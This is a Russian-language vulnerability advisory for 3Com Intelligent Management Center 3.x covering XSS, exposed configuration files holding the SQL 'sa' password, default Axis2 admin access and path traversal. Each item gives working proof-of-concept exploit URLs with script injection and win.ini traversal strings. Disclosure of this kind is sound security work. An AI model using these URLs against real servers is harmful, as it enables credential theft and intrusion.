Программа: 3Com Intelligent Management Center (IMC) 3.x

Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS
атаку и выполнить произвольный код на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "javax.faces.ViewState"
сценарием imc/login.jsf и данных передаваемых через URL в imc/dwr/interface/.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://target-domain.foo:8080/imc/login.jsf?loginForm%3a_link_hidden_=&javax.faces.ViewState=%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E
http://target-domain.foo:8080/imc/dwr/call/plaincall/blah?callCount=<script>alert(1)</script>

http://target-domain.foo:8080/imc/dwr/interface/<script>alert(1)</script>

2) Уязвимость возникает из-за ошибки в разграничении доступа к файлу
конфигурации "reportscript/oracle/deploypara.properties" в директории "/imc" и
файлу "reportscript/sqlserver/deploypara.properties" в директориях "/imc" и "/rpt".
Атакующий может выгрузить конфигурационные файлы и, например, просмотреть пароль
учетной записи SQL "sa".

Эксплоит:

http://target-domain.foo:8080/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=
reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://target-domain.foo:8080/imc/reportscript/sqlserver/deploypara.properties

http://target-domain.foo:8080/rpt/reportscript/sqlserver/deploypara.properties

http://target-domain.foo:8080/imc/reportscript/oracle/deploypara.properties

3) Уязвимость возникает из-за ошибки в разграничении доступа к imcws/services/listServices.
Атакующий может получить доступ к содержимому конфигурации Web сервисов.

Эксплоит:

http://target-domain.foo:8080/imcws/services/listServices
http://target-domain.foo:8080/imcws/axis2-admin/

4) Уязвимость возникает из-за того, что возможно получить доступ к консоли
Axis2 ("imcws/axis2-admin/") используя права доступа по умолчанию.

Эксплоит:

http://target-domain.foo:8080/imcws/

5) Уязвимость возникает из-за того, что данные передаваемые через параметры "fileName"
и "fileDir" в /imc/report/DownloadReportSource не правильно проверяются перед
использованием. Атакующий может выгрузить произвольные файлы на целевой системе.

Эксплоит:

http://target-domain.foo:8080/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports..\..\..\..\..\..\..\..\windows\win.ini%00reports&fileName=reportParaExample.xml

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии